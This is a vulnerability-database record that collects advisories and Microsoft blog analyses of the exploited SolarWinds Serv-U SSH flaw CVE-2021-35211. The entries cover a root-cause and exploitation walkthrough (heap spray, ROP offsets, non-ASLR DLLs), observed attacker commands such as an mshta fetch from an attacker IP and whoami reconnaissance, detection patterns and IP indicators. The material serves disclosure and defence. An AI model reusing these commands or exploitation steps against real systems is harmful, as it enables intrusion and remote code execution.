"cvelist": ["CVE-2021-35211", "CVE-2021-40539"], "modified": "2021-11-08T16:38:05", "id": "THREATPOST:BC99709891AA93FC7767B53445FC2736", "href": "https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202125.pdf>).\n\nA zero-day vulnerability (CVE-2021-35211) that impacts Serv-U Managed File Transfer and Serv-U Secure FTP is being exploited by multiple threat actors. The PoC of this exploited vulnerability was given to SolarWinds by Microsoft. SolarWinds has released a patch for the same.\n\n#### Vulnerability Details\n\n\n\n#### Indicator of Compromise\n\n**Type**| **Value** \n---|--- \nIP Address| 98.176.196.89 \n68.235.178.32 \n208.113.35.58 \n \n#### Patch Link\n\n<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>\n\n#### References\n\n<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>\n\n<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T12:50:52", "type": "hivepro", "title": "Threat Actors are actively exploiting a SolarWinds Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T12:50:52", "id": "HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13", "href": "https://www.hivepro.com/threat-actors-are-actively-exploiting-a-solarwinds-zero-day/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2021-09-02T16:13:25", "description": "Several weeks ago, Microsoft detected a 0-day remote code execution exploit being used to attack the SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributed the [attack](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures. In this blog, we share technical information about the vulnerability, tracked as [CVE-2021-35211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211>), that we shared with SolarWinds, who promptly released [security updates](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) to fix the vulnerability and mitigate the attacks.\n\nThis analysis was conducted by the Microsoft Offensive Research & Security Engineering team, a focused group tasked with supporting teams like MSTIC with exploit development expertise. Our team\u2019s remit is to make computing safer. 
We do this by leveraging our knowledge of attacker techniques and processes to build and improve protections in Windows and Azure through reverse engineering, attack creation and replication, vulnerability research, and intelligence sharing.\n\nIn early July, MSTIC provided our team with data that seemed to indicate exploit behavior against a newly-discovered vulnerability in the SolarWinds Serv-U FTP server\u2019s SSH component. Although the intel contained useful indicators, it lacked the exploit in question, so our team set out to reconstruct the exploit, which required us to first find and understand the new vulnerability in the Serv-U SSH-related code.\n\nAs we knew this was a remote, pre-auth vulnerability, we quickly constructed a fuzzer focused on the pre-auth portions of the SSH handshake and noticed that the service captured and passed all access violations without terminating the process. It immediately became evident that the Serv-U process would make stealthy, reliable exploitation attempts simple to accomplish. We concluded that the exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context. This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages. Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation.\n\nWe shared these findings, as well as the fuzzer we created, with SolarWinds through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/en-us/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/en-us/msrc/msvr>) (MSVR), and worked with them to fix the issue. 
This is an example of intelligence sharing and industry collaboration that result in comprehensive protection for the broader community through detection of attacks through products and fixing vulnerabilities through security updates.\n\n### Vulnerability in Serv-U\u2019s implementation of SSH\n\nSecure Shell (SSH) is a widely adopted protocol for secure communications over an untrusted network. The protocol behavior is defined in multiple requests for comment (RFCs), and existing implementations are available in open-source code; we primarily used [RFC 4253](<https://datatracker.ietf.org/doc/html/rfc4253>), [RFC 4252](<https://datatracker.ietf.org/doc/html/rfc4252>), and [libssh](<https://git.libssh.org/projects/libssh.git/tree/>) as references for this analysis.\n\nThe implementation of SSH in Serv-U was found by enumerating references to the \u201cSSH-\u201c string, which must be present in the first data sent to the server. The most likely instance of such code was the following:\n\n\n\n_Figure 1. Promising instance of \u201cSSH-\u201d string_\n\nPutting a breakpoint on the above code and attempting to connect to Serv-U with an SSH client confirmed our hypothesis and resulted in the breakpoint being hit with the following call stack:\n\n\n\n_Figure 2. The call stack resulting from a break point set on code in Figure 1._\n\nAt this point, we noticed that _Serv-U.dll_ and _RhinoNET.dll_ both have ASLR support disabled, making them prime locations for ROP gadgets, as any addresses within them will be constant across any server instances running on the internet for a given Serv-U version.\n\nAfter reversing related code in the _RhinoNET_ and _Serv-U_ DLLs, we could track SSH messages\u2019 paths as Serv-U processes them. To handle an incoming SSH connection, _Serv-U.dll_ creates a _CSUSSHSocket_ object, which is derived from the _RhinoNET!CRhinoSocket class_. 
The _CSUSSHSocket_ object lifetime is the length of the TCP connection\u2014it persists across possibly many individual TCP packets. The underlying _CRhinoSocket_ provides a buffered interface to the socket such that a single TCP packet may contain any number of bytes. This implies a single packet may include any number of SSH messages (provided they fit in the maximum buffer size), as well as partial SSH messages. The _CSUSSHSocket::ProcessRecvBuffer_ function is then responsible for parsing the SSH messages from the buffered socket data.\n\n_CSUSSHSocket::ProcessRecvBuffer_ begins by checking for the SSH version with _ParseBanner_. If _ParseBanner_ successfully parses the SSH version from the banner, _ProcessRecvBuffer_ then loops over _ParseMessage_, which obtains a pointer to the current message in the socket data and extracts the _msg_id_ and _length_ fields from the message (more on the _ParseMessage_ function later).\n\n\n\n_Figure 3. Selection of code from CSUSSHSocket::ProcessRecvBuffer processing loop_\n\nThe socket data being iterated over is conceptually an array of the pseudo-C structure _ssh_msg_t_, as seen below. The message data is contained within the payload buffer, the first byte of which is considered the _msg_id_:\n\n\n\n_ProcessRecvBuffer_ then dispatches handling of the message based on the _msg_id_. Some messages are handled directly from the message parsing loop, while others get passed to _ssh_pkt_others_, which posts the message to a queue for another thread to pick up and process.\n\n\n\n_Figure 4.Pre-auth reachable handlers in CSUSSHSocket::ProcessRecvBuffer_\n\nIf the _msg_id_ is deferred to the alternate thread, _CSSHSession::OnSSHMessage _processes it. This function mainly deals with messages that need to interact with Serv-U managed user profile data (e.g., authentication against per-user credentials) and UI updates. 
_CSSHSession::OnSSHMessage_ turned out to be uninteresting in terms of vulnerability hunting as most message handlers within it require successful user authentication (initial telemetry indicated this was a pre-authentication vulnerability), and no vulnerabilities were found in the remaining handlers.\n\nWhen initially running fuzzers against Serv-U with a debugger attached, it was evident that the application was catching exceptions which would normally crash a process (such as access violations), logging the error, modifying state just enough to avoid termination of the process, and then continuing as if there had been no problem. This behavior improves uptime of the file server application but also results in possible memory corruption lingering around in the process and building up over time. As an attacker, this grants opportunities like brute-forcing addresses of code or data with dynamic addresses.\n\nThis squashing of access violations assists with exploitation, but for fuzzing, we filtered out \u201cuninteresting\u201d exceptions generated by read/write access violations and let the fuzzer run until hitting a fault wherein RIP had been corrupted. This quickly resulted in the following crashing context:\n\n\n\n_Figure 5. WinDbg showing crashing context from fuzzer-generated SSH messages_\n\nAs seen above, _CRYPTO_ctr128_encrypt_ in _libeay32.dll_ (part of OpenSSL) attempted to call an invalid address. The version of OpenSSL used is 1.0.2u, so we obtained the [sources](<https://www.openssl.org/source/old/1.0.2/openssl-1.0.2u.tar.gz>) to peruse. 
The following shows the relevant OpenSSL function:\n\n\n\nMeanwhile, the following shows the structure that is passed:\n\n\n\nThe crashing function was reached from the OpenSSL API boundary via the following path: _EVP_EncryptUpdate_ -> _evp_EncryptDecryptUpdate_ -> _aes_ctr_cipher_ -> _CRYPTO_ctr128_encrypt_.\n\nLooking further up the call stack, it is evident that Serv-U calls _EVP_EncryptUpdate_ from _CSUSSHSocket::ParseMessage_, as seen below:\n\n\n\n_Figure 6. Location of call into OpenSSL, wherein attacker-controlled function pointer may be invoked_\n\nAt this point, we manually minimized the TCP packet buffer produced by the fuzzer until only the SSH messages required to trigger the crash remained. In notation like that used in the RFCs, the required SSH messages were:\n\n\n\nNote that the following description references \u201cencrypt\u201d functions being called when the crashing code path is clearly attempting to decrypt a buffer. This is not an error: Serv-U uses the encrypt OpenSSL API and, while not optimal for code clarity, it is behaviorally correct since Advanced Encryption Standard (AES) is operating in counter (CTR) mode.\n\nAfter taking a Time Travel Debugging trace and debugging through the message processing sequence, we found that the root cause of the issue was that Serv-U initially creates the OpenSSL AES128-CTR context with code like the following:\n\n\n\nCalling [_EVP_EncryptInit_ex_](<https://www.openssl.org/docs/man1.0.2/man3/EVP_EncryptInit_ex.html>) with NULL key and/or IV is valid, and Serv-U does so in this case because the context is created while handling the KEXINIT message, which is before key material is ready. However, AES key expansion is not performed until the key is set, and the data in the _ctx->cipher_data_ structure remains uninitialized until the key expansion is performed. 
We can (correctly) surmise that our sequence of messages to hit the crash has caused _enc_algo_client_to_server->decrypt_ to be called before the key material is initialized. The Serv-U KEXINIT handler creates objects for all parameters given in the message. However, the corresponding objects currently active for the connection are not replaced with the newly created ones until the following NEWKEYS message is processed. In a normal SSH connection, the client always completes the key exchange process before issuing a NEWKEYS message. Serv-U processed NEWKEYS (thus setting the _m_bCipherActive_ flag and replacing the cipher objects) no matter the connection state or key exchange. From this, we can see that the last message type in our fuzzed sequence does not matter\u2014there only needs to be some data remaining to be processed in the socket buffer to trigger decryption after the partially initialized AES CTR cipher object has been activated.\n\n### Exploitation\n\nAs the vulnerability allows loading RIP from uninitialized memory and as there are some modules without ASLR in the process, exploitation is not so complicated: we can find a way to control the content of the uninitialized _cipher_data _structure, point the _cipher_data->block_ function pointer at some initial ROP gadget, and start a ROP chain. Because of the exception handler causing any fault to be ignored, we do not necessarily need to attain reliable code execution upon the first packet. It is possible to retry exploitation until code execution is successful, however this will leave traces in log files and as such it may be worthwhile to invest more effort into a different technique which would avoid logging. The first step is to find the size of the _cipher_data_ allocation, as the most direct avenue to prefill the buffer is to spray allocations of the target allocation size and free them before attempting to reclaim the address as _cipher_data. 
ctx->cipher_data_ is allocated and assigned in EVP_CipherInit_ex with the following line:\n\n\n\nWith a debugger, we can see the _ctx_size_ in our case is _0x108_, and that this allocator winds up calling _ucrtbase!_malloc_base_. From previous reversing, we know that both _CRhinoSocket_ and _CSUSSHSocket_ levels of packet parsing call _operator new[]_ to allocate space to hold the packets we send. Luckily, that also winds up in _ucrtbase!_malloc_base_, using the same heap. Therefore, prefilling the target allocation is as simple as sending a properly sized TCP packet or SSH message and then closing the connection to ensure it is freed. Using this path to spray does not trigger other allocations of the same size, so we don\u2019t have to worry about polluting the heap.\n\nAnother important value to pull out of the debugger/disassembly is _offsetof(EVP_AES_KEY, block)_, as that offset in the sprayed data needs to be set to the initial ROP gadget. This value is _0xf8_. Conveniently, most of the rest of the _EVP_AES_KEY_ structure can be used for the ROP chain contents itself, and a pointer to the base of this structure exists in registers _rbx_, _r8_, and _r10_ at the time of the controlled function pointer call.\n\nAs a simple proof of concept, consider the following python code:\n\n\n\nThe above results in the following context in the debugger:\n\n\n\n_Figure 7. Machine context showing rcx, rdx, and rip controlled by attacker_\n\n### Conclusion: Responsible disclosure and industry collaboration improves security for all\n\nOur research shows that the Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration. An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. 
When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported.\n\nWe shared our findings to SolarWinds through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/en-us/msrc/cvd?rtc=1>) (CVD). We also shared the fuzzer we created. SolarWinds released an [advisory and security patch](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>), which we strongly encourage customers to apply. If you are not sure if your system is affected, open a support case in the [SolarWinds Customer Portal](<https://customerportal.solarwinds.com/support/submit-a-ticket?sid=satsn>).\n\nIn addition to sharing vulnerability details and fuzzing tooling with SolarWinds, we also recommended [enabling ASLR compatibility](<https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=msvc-160>) for all binaries loaded in the Serv-U process. Enabling ASLR is a simple compile-time flag which is enabled by default and has been available since Windows Vista. ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U.\n\nWe would like to thank SolarWinds for their prompt response. 
This case further underscores the need for constant collaboration among software vendors, security researchers, and other players to ensure the safety and security of users\u2019 computing experience.\n\n \n\n**_Microsoft Offensive Research & Security Engineering team_**\n\n \n\nThe post [A deep-dive into the SolarWinds Serv-U SSH vulnerability](<https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-02T16:00:56", "type": "mmpc", "title": "A deep-dive into the SolarWinds Serv-U SSH vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-09-02T16:00:56", "id": "MMPC:C6E199EAD7CE978C9F1B558F17746AFD", "href": "https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-27T08:39:32", "description": "Microsoft has detected a 
0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.\n\nThe vulnerability being exploited is CVE-2021-35211, which was [recently patched by SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>). The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U\u2019s implementation of the Secure Shell (SSH) protocol. If Serv-U\u2019s SSH is exposed to the internet, successful exploitation would give attackers the ability to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads, or view and change data. We strongly urge all customers to update their instances of Serv-U to the latest available version.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) has been protecting customers against malicious activity resulting from successful exploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files, behavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker\u2019s follow-on malicious actions. [Microsoft Threat Experts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide>) customers who were affected were notified of attacker activity and were aided in responding to the attack.\n\nMicrosoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we reported.\n\n## Who is DEV-0322?\n\nMSTIC tracks and investigates a range of malicious cyber activities and operations. 
During the tracking and investigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind an operation, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d or \u201cDEV group\u201d and assigns each DEV group a unique number (DEV-####) for tracking purposes.\n\nMSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies. This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.\n\n## Attack details\n\nMSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from _Serv-U.exe_ include:\n\n * _C:\\Windows\\System32\\mshta.exe http://144[.]34[.]179[.]162/a_ (defanged)\n * _cmd.exe /c whoami > "./Client/Common/redacted.txt"_\n * _cmd.exe /c dir > ".\\Client\\Common\\redacted.txt"_\n * _cmd.exe /c ""C:\\Windows\\Temp\\Serv-U.bat""_\n * _powershell.exe C:\\Windows\\Temp\\Serv-U.bat_\n * _cmd.exe /c type \\\\\\redacted\\redacted.Archive > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\redacted.Archive"_\n\nWe observed DEV-0322 piping the output of their _cmd.exe_ commands to files in the Serv-U _\\Client\\Common\\ _folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new [global user](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted_ .Archive _file in the _Global Users_ directory. 
Serv-U user information is stored in these _.Archive _files.\n\nDue to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, _DebugSocketLog.txt_. The process could also crash after a malicious command was run.\n\nBy reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.\n\nTo protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections that catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity related to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service, received a [targeted attack notification](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide#microsoft-threat-experts---targeted-attack-notification>), which contained details of the compromise. The Microsoft Threat Experts and MSTIC teams worked closely with these customers to respond to the attack and ensure their environments were secure.\n\n## Detection guidance\n\nCustomers should review the Serv-U _DebugSocketLog.txt_ log file for exception messages like the line below. A _C0000005; CSUSSHSocket::ProcessReceive_ exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. 
Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.\n\n`EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5`\n\nAdditional signs of potential compromise include:\n\n * Recent creation of_ .txt_ files in the Client\\Common\\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.\n * _Serv-U.exe_ spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for: \n * _mshta.exe_\n * _powershell.exe_\n * cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line: \n * _whoami_\n * _dir_\n * _./Client/Common_\n * _.\\Client\\Common_\n * _type [a file path] > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\\\[file name].Archive"_\n * Any process with any of the following in the command line: \n * _C:\\Windows\\Temp\\_\n * The addition of any unrecognized [global users](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. 
It can also be checked by looking for recently created files in _C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users_, which appears to store the Global users information.\n\n\n\n### Detection details\n\n#### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Behavior:Win32/ServuSpawnSuspProcess.A\n * Behavior:Win32/ServuSpawnCmdClientCommon.A\n\n#### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:\n\n * Suspicious behavior by Serv-U.exe\n\n#### Azure Sentinel query\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/DEV-0322_SolarWinds_Serv-U_IOC.yaml>).\n\n### Indicators of compromise (IOCs)\n\n * 98[.]176[.]196[.]89\n * 68[.]235[.]178[.]32\n * 208[.]113[.]35[.]58\n * 144[.]34[.]179[.]162\n * 97[.]77[.]97[.]58\n * hxxp://144[.]34[.]179[.]162/a\n * C:\\Windows\\Temp\\Serv-U.bat\n * C:\\Windows\\Temp\\test\\current.dmp\n\nThe post [Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": 
"2021-07-13T22:30:17", "type": "mmpc", "title": "Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T22:30:17", "id": "MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2", "href": "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:21", "description": "[](<https://thehackernews.com/images/-jV4pKLPO7z0/YO5ckCIQNCI/AAAAAAAADLw/TXffCrpewWobX23OGALAYFYzGr4TeTg5gCLcBGAsYHQ/s0/china-hackers.jpg>)\n\nMicrosoft on Tuesday disclosed that the latest string of attacks targeting SolarWinds Serv-U managed file transfer service with a now-patched remote code execution (RCE) exploit is the handiwork of a Chinese threat actor dubbed \"DEV-0322.\"\n\nThe revelation comes days after the Texas-based IT monitoring software maker issued fixes for the flaw that could enable adversaries to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads or view and alter sensitive data.\n\nTracked as [CVE-2021-35211](<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>), the RCE flaw resides in Serv-U's implementation of the Secure Shell (SSH) protocol. 
While it was previously revealed that the attacks were limited in scope, SolarWinds said it's \"unaware of the identity of the potentially affected customers.\"\n\nAttributing the intrusions with high confidence to DEV-0322 (short for \"Development Group 0322\") based on observed victimology, tactics, and procedures, Microsoft Threat Intelligence Center (MSTIC) said the adversary is known for targeting entities in the U.S. Defense Industrial Base Sector and software companies.\n\n[](<https://thehackernews.com/images/-55EFUGOJ584/YO5Y4JTqstI/AAAAAAAADLo/AkprVUi-G1ETMw4yhMrl4J5x66wUvYMcQCLcBGAsYHQ/s0/windows-malware.jpg>)\n\n\"This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,\" [according](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) to MSTIC, which discovered the zero-day after it detected as many as six anomalous malicious processes being spawned from the main Serv-U process, suggesting a compromise.\n\nThe development also marks the second time a China-based hacking group has exploited vulnerabilities in SolarWinds software as a fertile field for targeted attacks against corporate networks.\n\nBack in December 2020, Microsoft disclosed that a [separate espionage group](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. 
The intrusions have since been attributed to a China-linked threat actor called [Spiral](<https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html>).\n\nAdditional indicators of compromise associated with the attack can be accessed from SolarWinds' revised advisory [here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n**Update:** This article has been updated to reflect that attackers didn't exploit the SolarWinds flaw to target defense and software companies. As of now, no information has been provided on who was attacked during this zero-day attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T03:41:00", "type": "thn", "title": "Chinese Hackers Exploited Latest SolarWinds 0-Day in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-35211"], "modified": "2021-07-14T17:24:08", "id": "THN:05251A4D0E47381FEC6EC98D27F46C16", "href": "https://thehackernews.com/2021/07/chinese-hackers-exploit-latest.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[](<https://thehackernews.com/images/-xrVxmLD2g1c/YO0JK_DtgnI/AAAAAAAADKE/A8jsKUV1VfoaSivULzYY8fgaTL1LXIzaACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nSolarWinds, the Texas-based company that became the epicenter of a [massive supply chain attack](<https://thehackernews.com/2021/04/researchers-find-additional.html>) late last year, has issued patches to contain a remote code execution flaw in its Serv-U managed file transfer service.\n\nThe fixes, which target Serv-U Managed File Transfer and Serv-U Secure FTP products, arrive after Microsoft notified the IT management and remote monitoring software maker that the flaw was being exploited in the wild. The threat actor behind the exploitation remains unknown as yet, and it isn't clear exactly how the attack was carried out.\n\n\"Microsoft has provided evidence of limited, targeted customer impact, though SolarWinds does not currently have an estimate of how many customers may be directly affected by the vulnerability,\" SolarWinds [said](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in an advisory published Friday, adding it's \"unaware of the identity of the potentially affected customers.\"\n\nImpacting Serv-U versions 15.2.3 HF1 and before, a successful exploitation of the shortcoming ([CVE-2021-35211](<https://nvd.nist.gov/vuln/detail/CVE-2021-35211>)) could enable an adversary to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.\n\nAs indicators of compromise, the company is urging administrators to watch out for potentially suspicious connections via SSH from the IP addresses 98[.]176.196.89 and 
